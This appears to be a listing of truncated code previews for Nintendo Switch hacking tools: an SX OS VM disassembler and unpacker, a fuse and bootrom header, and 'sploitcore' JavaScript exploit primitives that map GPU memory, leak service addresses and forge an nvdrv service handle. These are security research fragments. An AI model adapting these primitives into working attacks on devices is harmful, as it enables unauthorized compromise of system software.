hexkyz

###########################################################
# TX SX OS MIPS VM disassembler - by hexkyz and naehrwert #
###########################################################

import os
import re
import struct

host_calls_0 = {
    0x8E943DA2 : "host_crc32 (ptr r4r5, len r6)",

hexkyz

###############################################
# TX SX OS unpacker - by hexkyz and naehrwert #
###############################################

from Crypto.Cipher import AES
from Crypto.Util import Counter
import os
import struct

"""

hexkyz

#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
#include <stdbool.h>
#include <string.h>

#define FUSE_IMAGE_SIZE                                             0x400
#define ROM_BASE                                                 0x100000

#define FUSE_BOOTROM_PATCH_SIZE_T210_START_BIT                         13

hexkyz

# The following is adapted from https://github.com/reswitched/loaders/blob/master/nxo64.py
#
# ===========================================================================================
#
# Copyright 2017 Reswitched Team
#
# Permission to use, copy, modify, and/or distribute this software for any purpose with or
# without fee is hereby granted, provided that the above copyright notice and this permission
# notice appear in all copies.
#

hexkyz

# The following is adapted from https://github.com/reswitched/loaders/blob/master/nxo64.py
#
# ===========================================================================================
#
# Copyright 2017 Reswitched Team
#
# Permission to use, copy, modify, and/or distribute this software for any purpose with or
# without fee is hereby granted, provided that the above copyright notice and this permission
# notice appear in all copies.
#

hexkyz

###############################################
# TX SX OS unpacker - by hexkyz and naehrwert #
###############################################

from Crypto.Cipher import AES
from Crypto.Util import Counter
import os
import struct

"""

hexkyz

sploitcore.prototype.nvhax_patch_creport = function(ch_base_addr, dram_addr, pid, mem_offset, mem_size) {
    var gpu_va = [0, 0x04];
    var dram_base_addr = (dram_addr & 0xFFF00000);
    var dram_offset = (dram_addr & 0x000F0000);
    
    // Map GPU MMIO
    var gpu_io_vaddr = this.nvhax_map_io(0x57000000, 0x01000000);
    
    // Patch the channel with the base DRAM address
    var ch_iova = this.nvhax_patch_channel(ch_base_addr, dram_base_addr);

hexkyz

sploitcore.prototype.send_request = function(srv_handle, type, domain_id, cmd_id, params, dump_reply, show_log) {
    var req_buf = this.malloc(0x1000);
    
    if (show_log)
        utils.log('Request buf: ' + utils.paddr(req_buf));
    
    var request_reply = [0, 0];
    var err_code = [0, 0];

    // One handle and 2 words input type

hexkyz

sploitcore.prototype.nvdrv_sharedmem_leak = function(nvdrv_buf, dev_handle) {
    var temp_buf = this.malloc(0x1000);
    var nvdrv_ioctl = this.bridge(0x1A247C, types.int, types.void_p, types.int, types.int, types.void_p, types.void_p, types.void_p);
    
    // Setup buffers
    var in_buf_ioctl = utils.add2(temp_buf, 0x000);
    var out_buf_ioctl = utils.add2(temp_buf, 0x100);
    var out_buf_status = utils.add2(temp_buf, 0x200);
    var in_buf = utils.add2(temp_buf, 0x800);
    var out_buf = utils.add2(temp_buf, 0x900);

hexkyz

sploitcore.prototype.break_nvdrv = function(sm_handle) {
    var meminfo = this.malloc(0x20);
    var pageinfo = this.malloc(0x8);
    
    // Leak nvservices base address
    var nvdrv_base = this.get_nvdrv_base(sm_handle);
    
    // Forge a new service handle for NVDRV
    var srv_handle = this.forge_handle(sm_handle, "nvdrv:t");